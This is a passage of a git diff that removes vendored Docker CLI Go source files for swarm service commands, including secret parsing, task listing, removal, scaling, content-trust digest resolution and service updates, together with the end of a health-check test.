opt.Set("14445")) - assert.Equal(t, *opt.Value(), uint64(14445)) -} - -func TestHealthCheckOptionsToHealthConfig(t *testing.T) { - dur := time.Second - opt := healthCheckOptions{ - cmd: "curl", - interval: PositiveDurationOpt{DurationOpt{value: &dur}}, - timeout: PositiveDurationOpt{DurationOpt{value: &dur}}, - retries: 10, - } - config, err := opt.toHealthConfig() - assert.NilError(t, err) - assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ - Test: []string{"CMD-SHELL", "curl"}, - Interval: time.Second, - Timeout: time.Second, - Retries: 10, - }), true) -} - -func TestHealthCheckOptionsToHealthConfigNoHealthcheck(t *testing.T) { - opt := healthCheckOptions{ - noHealthcheck: true, - } - config, err := opt.toHealthConfig() - assert.NilError(t, err) - assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ - Test: []string{"NONE"}, - }), true) -} - -func TestHealthCheckOptionsToHealthConfigConflict(t *testing.T) { - opt := healthCheckOptions{ - cmd: "curl", - noHealthcheck: true, - } - _, err := opt.toHealthConfig() - assert.Error(t, err, "--no-healthcheck conflicts with --health-* options") -} diff --git a/vendor/github.com/docker/docker/cli/command/service/parse.go b/vendor/github.com/docker/docker/cli/command/service/parse.go deleted file mode 100644 index ce9b454edd..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/parse.go +++ /dev/null @@ -1,68 +0,0 @@ -package service - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - swarmtypes "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/client" - "golang.org/x/net/context" -) - -// ParseSecrets retrieves the secrets from the requested names and converts -// them to secret references to use with the spec -func ParseSecrets(client client.SecretAPIClient, requestedSecrets []*types.SecretRequestOption) ([]*swarmtypes.SecretReference, error) { - secretRefs := make(map[string]*swarmtypes.SecretReference) - ctx := context.Background() - - for _, secret := range requestedSecrets { - if _, exists := secretRefs[secret.Target]; exists { - return nil, fmt.Errorf("duplicate secret target for %s not allowed", secret.Source) - } - secretRef := &swarmtypes.SecretReference{ - File: &swarmtypes.SecretReferenceFileTarget{ - Name: secret.Target, - UID: secret.UID, - GID: secret.GID, - Mode: secret.Mode, - }, - SecretName: secret.Source, - } - - secretRefs[secret.Target] = secretRef - } - - args := filters.NewArgs() - for _, s := range secretRefs { - args.Add("names", s.SecretName) - } - - secrets, err := client.SecretList(ctx, types.SecretListOptions{ - Filters: args, - }) - if err != nil { - return nil, err - } - - foundSecrets := make(map[string]string) - for _, secret := range secrets { - foundSecrets[secret.Spec.Annotations.Name] = secret.ID - } - - addedSecrets := []*swarmtypes.SecretReference{} - - for _, ref := range secretRefs { - id, ok := foundSecrets[ref.SecretName] - if !ok { - return nil, fmt.Errorf("secret not found: %s", ref.SecretName) - } - - // set the id for the ref to properly assign in swarm - // since swarm needs the ID instead of the name - ref.SecretID = id - addedSecrets = append(addedSecrets, ref) - } - - return addedSecrets, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/ps.go b/vendor/github.com/docker/docker/cli/command/service/ps.go deleted file mode 100644 index cf94ad7374..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/ps.go +++ /dev/null @@ -1,76 +0,0 @@ -package service - -import ( - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/cli/command/node" - "github.com/docker/docker/cli/command/task" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type psOptions struct { - serviceID string - quiet bool - noResolve bool - noTrunc bool - filter opts.FilterOpt -} - -func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS] SERVICE", - Short: "List the tasks of a service", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.serviceID = args[0] - return runPS(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display task IDs") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runPS(dockerCli *command.DockerCli, opts psOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - service, _, err := client.ServiceInspectWithRaw(ctx, opts.serviceID) - if err != nil { - return err - } - - filter := opts.filter.Value() - filter.Add("service", service.ID) - if filter.Include("node") { - nodeFilters := filter.Get("node") - for _, nodeFilter := range nodeFilters { - nodeReference, err := node.Reference(ctx, client, nodeFilter) - if err != nil { - return err - } - filter.Del("node", nodeFilter) - filter.Add("node", nodeReference) - } - } - - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) - if err != nil { - return err - } - - if opts.quiet { - return task.PrintQuiet(dockerCli, tasks) - } - return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/service/remove.go b/vendor/github.com/docker/docker/cli/command/service/remove.go deleted file mode 100644 index c3fbbabbca..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/remove.go +++ /dev/null @@ -1,47 +0,0 @@ -package service - -import ( - "fmt" - "strings" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - - cmd := &cobra.Command{ - Use: "rm SERVICE [SERVICE...]", - Aliases: []string{"remove"}, - Short: "Remove one or more services", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args) - }, - } - cmd.Flags() - - return cmd -} - -func runRemove(dockerCli *command.DockerCli, sids []string) error { - client := dockerCli.Client() - - ctx := context.Background() - - var errs []string - for _, sid := range sids { - err := client.ServiceRemove(ctx, sid) - if err != nil { - errs = append(errs, err.Error()) - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", sid) - } - if len(errs) > 0 { - return fmt.Errorf(strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/scale.go b/vendor/github.com/docker/docker/cli/command/service/scale.go deleted file mode 100644 index cf89e90273..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/scale.go +++ /dev/null @@ -1,96 +0,0 @@ -package service - -import ( - "fmt" - "strconv" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newScaleCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "scale SERVICE=REPLICAS [SERVICE=REPLICAS...]", - Short: "Scale one or multiple replicated services", - Args: scaleArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runScale(dockerCli, args) - }, - } -} - -func scaleArgs(cmd *cobra.Command, args []string) error { - if err := cli.RequiresMinArgs(1)(cmd, args); err != nil { - return err - } - for _, arg := range args { - if parts := strings.SplitN(arg, "=", 2); len(parts) != 2 { - return fmt.Errorf( - "Invalid scale specifier '%s'.\nSee '%s --help'.\n\nUsage: %s\n\n%s", - arg, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } - } - return nil -} - -func runScale(dockerCli *command.DockerCli, args []string) error { - var errors []string - for _, arg := range args { - parts := strings.SplitN(arg, "=", 2) - serviceID, scaleStr := parts[0], parts[1] - - // validate input arg scale number - scale, err := strconv.ParseUint(scaleStr, 10, 64) - if err != nil { - errors = append(errors, fmt.Sprintf("%s: invalid replicas value %s: %v", serviceID, scaleStr, err)) - continue - } - - if err := runServiceScale(dockerCli, serviceID, scale); err != nil { - errors = append(errors, fmt.Sprintf("%s: %v", serviceID, err)) - } - } - - if len(errors) == 0 { - return nil - } - return fmt.Errorf(strings.Join(errors, "\n")) -} - -func runServiceScale(dockerCli *command.DockerCli, serviceID string, scale uint64) error { - client := dockerCli.Client() - ctx := context.Background() - - service, _, err := client.ServiceInspectWithRaw(ctx, serviceID) - if err != nil { - return err - } - - serviceMode := &service.Spec.Mode - if serviceMode.Replicated == nil { - return fmt.Errorf("scale can only be used with replicated mode") - } - - serviceMode.Replicated.Replicas = &scale - - response, err := client.ServiceUpdate(ctx, service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{}) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - - fmt.Fprintf(dockerCli.Out(), "%s scaled to %d\n", serviceID, scale) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/trust.go b/vendor/github.com/docker/docker/cli/command/service/trust.go deleted file mode 100644 index 052d49c32a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/trust.go +++ /dev/null @@ -1,96 +0,0 @@ -package service - -import ( - "encoding/hex" - "fmt" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/trust" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/docker/notary/tuf/data" - "github.com/pkg/errors" - "golang.org/x/net/context" -) - -func resolveServiceImageDigest(dockerCli *command.DockerCli, service *swarm.ServiceSpec) error { - if !command.IsTrusted() { - // Digests are resolved by the daemon when not using content - // trust. - return nil - } - - image := service.TaskTemplate.ContainerSpec.Image - - // We only attempt to resolve the digest if the reference - // could be parsed as a digest reference. Specifying an image ID - // is valid but not resolvable. There is no warning message for - // an image ID because it's valid to use one. - if _, err := digest.ParseDigest(image); err == nil { - return nil - } - - ref, err := reference.ParseNamed(image) - if err != nil { - return fmt.Errorf("Could not parse image reference %s", service.TaskTemplate.ContainerSpec.Image) - } - if _, ok := ref.(reference.Canonical); !ok { - ref = reference.WithDefaultTag(ref) - - taggedRef, ok := ref.(reference.NamedTagged) - if !ok { - // This should never happen because a reference either - // has a digest, or WithDefaultTag would give it a tag. - return errors.New("Failed to resolve image digest using content trust: reference is missing a tag") - } - - resolvedImage, err := trustedResolveDigest(context.Background(), dockerCli, taggedRef) - if err != nil { - return fmt.Errorf("Failed to resolve image digest using content trust: %v", err) - } - logrus.Debugf("resolved image tag to %s using content trust", resolvedImage.String()) - service.TaskTemplate.ContainerSpec.Image = resolvedImage.String() - } - return nil -} - -func trustedResolveDigest(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged) (distreference.Canonical, error) { - repoInfo, err := registry.ParseRepositoryInfo(ref) - if err != nil { - return nil, err - } - - authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) - - notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") - if err != nil { - return nil, errors.Wrap(err, "error establishing connection to trust repository") - } - - t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return nil, trust.NotaryError(repoInfo.FullName(), err) - } - // Only get the tag if it's in the top level targets role or the releases delegation role - // ignore it if it's in any other delegation roles - if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { - return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.String())) - } - - logrus.Debugf("retrieving target for %s role\n", t.Role) - h, ok := t.Hashes["sha256"] - if !ok { - return nil, errors.New("no valid hash, expecting sha256") - } - - dgst := digest.NewDigestFromHex("sha256", hex.EncodeToString(h)) - - // Using distribution reference package to make sure that adding a - // digest does not erase the tag. When the two reference packages - // are unified, this will no longer be an issue. - return distreference.WithDigest(ref, dgst) -} diff --git a/vendor/github.com/docker/docker/cli/command/service/update.go b/vendor/github.com/docker/docker/cli/command/service/update.go deleted file mode 100644 index d56de10913..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/update.go +++ /dev/null @@ -1,849 +0,0 @@ -package service - -import ( - "fmt" - "sort" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/client" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-connections/nat" - shlex "github.com/flynn-archive/go-shlex" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - serviceOpts := newServiceOptions() - - cmd := &cobra.Command{ - Use: "update [OPTIONS] SERVICE", - Short: "Update a service", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runUpdate(dockerCli, cmd.Flags(), args[0]) - }, - } - - flags := cmd.Flags() - flags.String("image", "", "Service image tag") - flags.String("args", "", "Service command args") - flags.Bool("rollback", false, "Rollback to previous specification") - flags.Bool("force", false, "Force update even if no changes require it") - addServiceFlags(cmd, serviceOpts) - - flags.Var(newListOptsVar(), flagEnvRemove, "Remove an environment variable") - flags.Var(newListOptsVar(), flagGroupRemove, "Remove a previously added supplementary user group from the container") - flags.Var(newListOptsVar(), flagLabelRemove, "Remove a label by its key") - flags.Var(newListOptsVar(), flagContainerLabelRemove, "Remove a container label by its key") - flags.Var(newListOptsVar(), flagMountRemove, "Remove a mount by its target path") - // flags.Var(newListOptsVar().WithValidator(validatePublishRemove), flagPublishRemove, "Remove a published port by its target port") - flags.Var(&opts.PortOpt{}, flagPublishRemove, "Remove a published port by its target port") - flags.Var(newListOptsVar(), flagConstraintRemove, "Remove a constraint") - flags.Var(newListOptsVar(), flagDNSRemove, "Remove a custom DNS server") - flags.Var(newListOptsVar(), flagDNSOptionRemove, "Remove a DNS option") - flags.Var(newListOptsVar(), flagDNSSearchRemove, "Remove a DNS search domain") - flags.Var(newListOptsVar(), flagHostRemove, "Remove a custom host-to-IP mapping (host:ip)") - flags.Var(&serviceOpts.labels, flagLabelAdd, "Add or update a service label") - flags.Var(&serviceOpts.containerLabels, flagContainerLabelAdd, "Add or update a container label") - flags.Var(&serviceOpts.env, flagEnvAdd, "Add or update an environment variable") - flags.Var(newListOptsVar(), flagSecretRemove, "Remove a secret") - flags.Var(&serviceOpts.secrets, flagSecretAdd, "Add or update a secret on a service") - flags.Var(&serviceOpts.mounts, flagMountAdd, "Add or update a mount on a service") - flags.Var(&serviceOpts.constraints, flagConstraintAdd, "Add or update a placement constraint") - flags.Var(&serviceOpts.endpoint.publishPorts, flagPublishAdd, "Add or update a published port") - flags.Var(&serviceOpts.groups, flagGroupAdd, "Add an additional supplementary user group to the container") - flags.Var(&serviceOpts.dns, flagDNSAdd, "Add or update a custom DNS server") - flags.Var(&serviceOpts.dnsOption, flagDNSOptionAdd, "Add or update a DNS option") - flags.Var(&serviceOpts.dnsSearch, flagDNSSearchAdd, "Add or update a custom DNS search domain") - flags.Var(&serviceOpts.hosts, flagHostAdd, "Add or update a custom host-to-IP mapping (host:ip)") - - return cmd -} - -func newListOptsVar() *opts.ListOpts { - return opts.NewListOptsRef(&[]string{}, nil) -} - -func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, serviceID string) error { - apiClient := dockerCli.Client() - ctx := context.Background() - updateOpts := types.ServiceUpdateOptions{} - - service, _, err := apiClient.ServiceInspectWithRaw(ctx, serviceID) - if err != nil { - return err - } - - rollback, err := flags.GetBool("rollback") - if err != nil { - return err - } - - spec := &service.Spec - if rollback { - spec = service.PreviousSpec - if spec == nil { - return fmt.Errorf("service does not have a previous specification to roll back to") - } - } - - err = updateService(flags, spec) - if err != nil { - return err - } - - if flags.Changed("image") { - if err := resolveServiceImageDigest(dockerCli, spec); err != nil { - return err - } - } - - updatedSecrets, err := getUpdatedSecrets(apiClient, flags, spec.TaskTemplate.ContainerSpec.Secrets) - if err != nil { - return err - } - - spec.TaskTemplate.ContainerSpec.Secrets = updatedSecrets - - // only send auth if flag was set - sendAuth, err := flags.GetBool(flagRegistryAuth) - if err != nil { - return err - } - if sendAuth { - // Retrieve encoded auth token from the image reference - // This would be the old image if it didn't change in this update - image := spec.TaskTemplate.ContainerSpec.Image - encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) - if err != nil { - return err - } - updateOpts.EncodedRegistryAuth = encodedAuth - } else if rollback { - updateOpts.RegistryAuthFrom = types.RegistryAuthFromPreviousSpec - } else { - updateOpts.RegistryAuthFrom = types.RegistryAuthFromSpec - } - - response, err := apiClient.ServiceUpdate(ctx, service.ID, service.Version, *spec, updateOpts) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", serviceID) - return nil -} - -func updateService(flags *pflag.FlagSet, spec *swarm.ServiceSpec) error { - updateString := func(flag string, field *string) { - if flags.Changed(flag) { - *field, _ = flags.GetString(flag) - } - } - - updateInt64Value := func(flag string, field *int64) { - if flags.Changed(flag) { - *field = flags.Lookup(flag).Value.(int64Value).Value() - } - } - - updateFloatValue := func(flag string, field *float32) { - if flags.Changed(flag) { - *field = flags.Lookup(flag).Value.(*floatValue).Value() - } - } - - updateDuration := func(flag string, field *time.Duration) { - if flags.Changed(flag) { - *field, _ = flags.GetDuration(flag) - } - } - - updateDurationOpt := func(flag string, field **time.Duration) { - if flags.Changed(flag) { - val := *flags.Lookup(flag).Value.(*DurationOpt).Value() - *field = &val - } - } - - updateUint64 := func(flag string, field *uint64) { - if flags.Changed(flag) { - *field, _ = flags.GetUint64(flag) - } - } - - updateUint64Opt := func(flag string, field **uint64) { - if flags.Changed(flag) { - val := *flags.Lookup(flag).Value.(*Uint64Opt).Value() - *field = &val - } - } - - cspec := &spec.TaskTemplate.ContainerSpec - task := &spec.TaskTemplate - - taskResources := func() *swarm.ResourceRequirements { - if task.Resources == nil { - task.Resources = &swarm.ResourceRequirements{} - } - return task.Resources - } - - updateLabels(flags, &spec.Labels) - updateContainerLabels(flags, &cspec.Labels) - updateString("image", &cspec.Image) - updateStringToSlice(flags, "args", &cspec.Args) - updateEnvironment(flags, &cspec.Env) - updateString(flagWorkdir, &cspec.Dir) - updateString(flagUser, &cspec.User) - updateString(flagHostname, &cspec.Hostname) - if err := updateMounts(flags, &cspec.Mounts); err != nil { - return err - } - - if flags.Changed(flagLimitCPU) || flags.Changed(flagLimitMemory) { - taskResources().Limits = &swarm.Resources{} - updateInt64Value(flagLimitCPU, &task.Resources.Limits.NanoCPUs) - updateInt64Value(flagLimitMemory, &task.Resources.Limits.MemoryBytes) - } - if flags.Changed(flagReserveCPU) || flags.Changed(flagReserveMemory) { - taskResources().Reservations = &swarm.Resources{} - updateInt64Value(flagReserveCPU, &task.Resources.Reservations.NanoCPUs) - updateInt64Value(flagReserveMemory, &task.Resources.Reservations.MemoryBytes) - } - - updateDurationOpt(flagStopGracePeriod, &cspec.StopGracePeriod) - - if anyChanged(flags, flagRestartCondition, flagRestartDelay, flagRestartMaxAttempts, flagRestartWindow) { - if task.RestartPolicy == nil { - task.RestartPolicy = &swarm.RestartPolicy{} - } - - if flags.Changed(flagRestartCondition) { - value, _ := flags.GetString(flagRestartCondition) - task.RestartPolicy.Condition = swarm.RestartPolicyCondition(value) - } - updateDurationOpt(flagRestartDelay, &task.RestartPolicy.Delay) - updateUint64Opt(flagRestartMaxAttempts, &task.RestartPolicy.MaxAttempts) - updateDurationOpt(flagRestartWindow, &task.RestartPolicy.Window) - } - - if anyChanged(flags, flagConstraintAdd, flagConstraintRemove) { - if task.Placement == nil { - task.Placement = &swarm.Placement{} - } - updatePlacement(flags, task.Placement) - } - - if err := updateReplicas(flags, &spec.Mode); err != nil { - return err - } - - if anyChanged(flags, flagUpdateParallelism, flagUpdateDelay, flagUpdateMonitor, flagUpdateFailureAction, flagUpdateMaxFailureRatio) { - if spec.UpdateConfig == nil { - spec.UpdateConfig = &swarm.UpdateConfig{} - } - updateUint64(flagUpdateParallelism, &spec.UpdateConfig.Parallelism) - updateDuration(flagUpdateDelay, &spec.UpdateConfig.Delay) - updateDuration(flagUpdateMonitor, &spec.UpdateConfig.Monitor) - updateString(flagUpdateFailureAction, &spec.UpdateConfig.FailureAction) - updateFloatValue(flagUpdateMaxFailureRatio, &spec.UpdateConfig.MaxFailureRatio) - } - - if flags.Changed(flagEndpointMode) { - value, _ := flags.GetString(flagEndpointMode) - if spec.EndpointSpec == nil { - spec.EndpointSpec = &swarm.EndpointSpec{} - } - spec.EndpointSpec.Mode = swarm.ResolutionMode(value) - } - - if anyChanged(flags, flagGroupAdd, flagGroupRemove) { - if err := updateGroups(flags, &cspec.Groups); err != nil { - return err - } - } - - if anyChanged(flags, flagPublishAdd, flagPublishRemove) { - if spec.EndpointSpec == nil { - spec.EndpointSpec = &swarm.EndpointSpec{} - } - if err := updatePorts(flags, &spec.EndpointSpec.Ports); err != nil { - return err - } - } - - if anyChanged(flags, flagDNSAdd, flagDNSRemove, flagDNSOptionAdd, flagDNSOptionRemove, flagDNSSearchAdd, flagDNSSearchRemove) { - if cspec.DNSConfig == nil { - cspec.DNSConfig = &swarm.DNSConfig{} - } - if err := updateDNSConfig(flags, &cspec.DNSConfig); err != nil { - return err - } - } - - if anyChanged(flags, flagHostAdd, flagHostRemove) { - if err := updateHosts(flags, &cspec.Hosts); err != nil { - return err - } - } - - if err := updateLogDriver(flags, &spec.TaskTemplate); err != nil { - return err - } - - force, err := flags.GetBool("force") - if err != nil { - return err - } - - if force { - spec.TaskTemplate.ForceUpdate++ - } - - if err := updateHealthcheck(flags, cspec); err != nil { - return err - } - - if flags.Changed(flagTTY) { - tty, err := flags.GetBool(flagTTY) - if err != nil { - return err - } - cspec.TTY = tty - } - - return nil -} - -func updateStringToSlice(flags *pflag.FlagSet, flag string, field *[]string) error { - if !flags.Changed(flag) { - return nil - } - - value, _ := flags.GetString(flag) - valueSlice, err := shlex.Split(value) - *field = valueSlice - return err -} - -func anyChanged(flags *pflag.FlagSet, fields ...string) bool { - for _, flag := range fields { - if flags.Changed(flag) { - return true - } - } - return false -} - -func updatePlacement(flags *pflag.FlagSet, placement *swarm.Placement) { - if flags.Changed(flagConstraintAdd) { - values := flags.Lookup(flagConstraintAdd).Value.(*opts.ListOpts).GetAll() - placement.Constraints = append(placement.Constraints, values...) - } - toRemove := buildToRemoveSet(flags, flagConstraintRemove) - - newConstraints := []string{} - for _, constraint := range placement.Constraints { - if _, exists := toRemove[constraint]; !exists { - newConstraints = append(newConstraints, constraint) - } - } - // Sort so that result is predictable. - sort.Strings(newConstraints) - - placement.Constraints = newConstraints -} - -func updateContainerLabels(flags *pflag.FlagSet, field *map[string]string) { - if flags.Changed(flagContainerLabelAdd) { - if *field == nil { - *field = map[string]string{} - } - - values := flags.Lookup(flagContainerLabelAdd).Value.(*opts.ListOpts).GetAll() - for key, value := range runconfigopts.ConvertKVStringsToMap(values) { - (*field)[key] = value - } - } - - if *field != nil && flags.Changed(flagContainerLabelRemove) { - toRemove := flags.Lookup(flagContainerLabelRemove).Value.(*opts.ListOpts).GetAll() - for _, label := range toRemove { - delete(*field, label) - } - } -} - -func updateLabels(flags *pflag.FlagSet, field *map[string]string) { - if flags.Changed(flagLabelAdd) { - if *field == nil { - *field = map[string]string{} - } - - values := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() - for key, value := range runconfigopts.ConvertKVStringsToMap(values) { - (*field)[key] = value - } - } - - if *field != nil && flags.Changed(flagLabelRemove) { - toRemove := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() - for _, label := range toRemove { - delete(*field, label) - } - } -} - -func updateEnvironment(flags *pflag.FlagSet, field *[]string) { - envSet := map[string]string{} - for _, v := range *field { - envSet[envKey(v)] = v - } - if flags.Changed(flagEnvAdd) { - value := flags.Lookup(flagEnvAdd).Value.(*opts.ListOpts) - for _, v := range value.GetAll() { - envSet[envKey(v)] = v - } - } - - *field = []string{} - for _, v := range envSet { - *field = append(*field, v) - } - - toRemove := buildToRemoveSet(flags, flagEnvRemove) - *field = removeItems(*field, toRemove, envKey) -} - -func getUpdatedSecrets(apiClient client.SecretAPIClient, flags *pflag.FlagSet, secrets []*swarm.SecretReference) ([]*swarm.SecretReference, error) { - if flags.Changed(flagSecretAdd) { - values := flags.Lookup(flagSecretAdd).Value.(*opts.SecretOpt).Value() - - addSecrets, err := ParseSecrets(apiClient, values) - if err != nil { - return nil, err - } - secrets = append(secrets, addSecrets...) - } - toRemove := buildToRemoveSet(flags, flagSecretRemove) - newSecrets := []*swarm.SecretReference{} - for _, secret := range secrets { - if _, exists := toRemove[secret.SecretName]; !exists { - newSecrets = append(newSecrets, secret) - } - } - - return newSecrets, nil -} - -func envKey(value string) string { - kv := strings.SplitN(value, "=", 2) - return kv[0] -} - -func itemKey(value string) string { - return value -} - -func buildToRemoveSet(flags *pflag.FlagSet, flag string) map[string]struct{} { - var empty struct{} - toRemove := make(map[string]struct{}) - - if !flags.Changed(flag) { - return toRemove - } - - toRemoveSlice := flags.Lookup(flag).Value.(*opts.ListOpts).GetAll() - for _, key := range toRemoveSlice { - toRemove[key] = empty - } - return toRemove -} - -func removeItems( - seq []string, - toRemove map[string]struct{}, - keyFunc func(string) string, -) []string { - newSeq := []string{} - for _, item := range seq { - if _, exists := toRemove[keyFunc(item)]; !exists { - newSeq = append(newSeq, item) - } - } - return newSeq -} - -type byMountSource []mounttypes.Mount - -func (m byMountSource) Len() int { return len(m) } -func (m byMountSource) Swap(i, j int) { m[i], m[j] = m[j], m[i] } -func (m byMountSource) Less(i, j int) bool { - a, b := m[i], m[j] - - if a.Source == b.Source { - return a.Target < b.Target - } - - return a.Source < b.Source -} - -func updateMounts(flags *pflag.FlagSet, mounts *[]mounttypes.Mount) error { - - mountsByTarget := map[string]mounttypes.Mount{} - - if flags.Changed(flagMountAdd) { - values := flags.Lookup(flagMountAdd).Value.(*opts.MountOpt).Value() - for _, mount := range values { - if _, ok := mountsByTarget[mount.Target]; ok { - return fmt.Errorf("duplicate mount target") - } - mountsByTarget[mount.Target] = mount - } - } - - // Add old list of mount points minus updated one. - for _, mount := range *mounts { - if _, ok := mountsByTarget[mount.Target]; !ok { - mountsByTarget[mount.Target] = mount - } - } - - newMounts := []mounttypes.Mount{} - - toRemove := buildToRemoveSet(flags, flagMountRemove) - - for _, mount := range mountsByTarget { - if _, exists := toRemove[mount.Target]; !exists { - newMounts = append(newMounts, mount) - } - } - sort.Sort(byMountSource(newMounts)) - *mounts = newMounts - return nil -} - -func updateGroups(flags *pflag.FlagSet, groups *[]string) error { - if flags.Changed(flagGroupAdd) { - values := flags.Lookup(flagGroupAdd).Value.(*opts.ListOpts).GetAll() - *groups = append(*groups, values...) - } - toRemove := buildToRemoveSet(flags, flagGroupRemove) - - newGroups := []string{} - for _, group := range *groups { - if _, exists := toRemove[group]; !exists { - newGroups = append(newGroups, group) - } - } - // Sort so that result is predictable. - sort.Strings(newGroups) - - *groups = newGroups - return nil -} - -func removeDuplicates(entries []string) []string { - hit := map[string]bool{} - newEntries := []string{} - for _, v := range entries { - if !hit[v] { - newEntries = append(newEntries, v) - hit[v] = true - } - } - return newEntries -} - -func updateDNSConfig(flags *pflag.FlagSet, config **swarm.DNSConfig) error { - newConfig := &swarm.DNSConfig{} - - nameservers := (*config).Nameservers - if flags.Changed(flagDNSAdd) { - values := flags.Lookup(flagDNSAdd).Value.(*opts.ListOpts).GetAll() - nameservers = append(nameservers, values...) - } - nameservers = removeDuplicates(nameservers) - toRemove := buildToRemoveSet(flags, flagDNSRemove) - for _, nameserver := range nameservers { - if _, exists := toRemove[nameserver]; !exists { - newConfig.Nameservers = append(newConfig.Nameservers, nameserver) - - } - } - // Sort so that result is predictable. - sort.Strings(newConfig.Nameservers) - - search := (*config).Search - if flags.Changed(flagDNSSearchAdd) { - values := flags.Lookup(flagDNSSearchAdd).Value.(*opts.ListOpts).GetAll() - search = append(search, values...) - } - search = removeDuplicates(search) - toRemove = buildToRemoveSet(flags, flagDNSSearchRemove) - for _, entry := range search { - if _, exists := toRemove[entry]; !exists { - newConfig.Search = append(newConfig.Search, entry) - } - } - // Sort so that result is predictable. - sort.Strings(newConfig.Search) - - options := (*config).Options - if flags.Changed(flagDNSOptionAdd) { - values := flags.Lookup(flagDNSOptionAdd).Value.(*opts.ListOpts).GetAll() - options = append(options, values...) - } - options = removeDuplicates(options) - toRemove = buildToRemoveSet(flags, flagDNSOptionRemove) - for _, option := range options { - if _, exists := toRemove[option]; !exists { - newConfig.Options = append(newConfig.Options, option) - } - } - // Sort so that result is predictable. - sort.Strings(newConfig.Options) - - *config = newConfig - return nil -} - -type byPortConfig []swarm.PortConfig - -func (r byPortConfig) Len() int { return len(r) } -func (r byPortConfig) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byPortConfig) Less(i, j int) bool { - // We convert PortConfig into `port/protocol`, e.g., `80/tcp` - // In updatePorts we already filter out with map so there is duplicate entries - return portConfigToString(&r[i]) < portConfigToString(&r[j]) -} - -func portConfigToString(portConfig *swarm.PortConfig) string { - protocol := portConfig.Protocol - mode := portConfig.PublishMode - return fmt.Sprintf("%v:%v/%s/%s", portConfig.PublishedPort, portConfig.TargetPort, protocol, mode) -} - -// FIXME(vdemeester) port to opts.PortOpt -// This validation is only used for `--publish-rm`. -// The `--publish-rm` takes: -// [/] (e.g., 80, 80/tcp, 53/udp) -func validatePublishRemove(val string) (string, error) { - proto, port := nat.SplitProtoPort(val) - if proto != "tcp" && proto != "udp" { - return "", fmt.Errorf("invalid protocol '%s' for %s", proto, val) - } 